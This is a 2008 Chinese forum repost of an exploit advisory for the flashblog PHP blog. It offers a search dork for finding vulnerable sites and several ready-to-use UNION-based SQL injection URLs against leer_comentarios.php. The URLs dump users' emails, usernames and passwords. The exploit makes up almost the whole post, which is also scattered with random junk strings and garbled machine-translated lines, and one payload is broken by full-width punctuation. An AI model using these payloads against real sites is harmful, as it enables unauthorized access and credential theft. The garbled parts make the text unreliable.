闪存博客SQL注入(页 1) - 电脑综合区 - 我爱电脑技术论坛打造最好的电脑自学交流论坛

star2008 发表于 2008-6-4 10:02

闪存博客SQL注入

来自： < 16.her0_at_gmail.com >
日期： 2008年5月29日4时24分39秒-0000 Ma Xi1Zn'q

('binary' encoding is not supported, stored as-is) ###############################################################################  R2@P;j1k6W*p
# Rt4|0v"j#pUv
# 姓名： flashblog SQL inyeccion %J,l5I,g1_ aaW8LT
# 作者： her0
# Dork : "flashblog", allinurl:flashblog.html
# Greetz : Komtec1,Freak,Knet,Boer,ka0x o$co?hDN
#  ;gqU!`&sas*ikD&~
###############################################################################
'm;uM2[]}_g
Proof of Concept :概念证明：
N/hmk R+c+RrZ

http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
w+CZDy;q-a O
3x`(hSJo
C Ri:D\"U4{
该colums从主机到主机的不同：所有解决= D的
/PHP/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat（email,0x203a3a20,nombreusuario，0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*
6]1w"rLj5K@8W4~

############################################################################### ################################################## #############################
#
#  墨西哥到2008年，感谢所有我的朋友们，我爱威士忌XD法 ;EB2w E(}h;v
#  [url]http://milw0rm.com/exploit...[/url] $mq)v&|v3d0D?
############################################################################### ################################################## #############################

页: [1]

我爱电脑技术论坛's Archiver

闪存博客SQL注入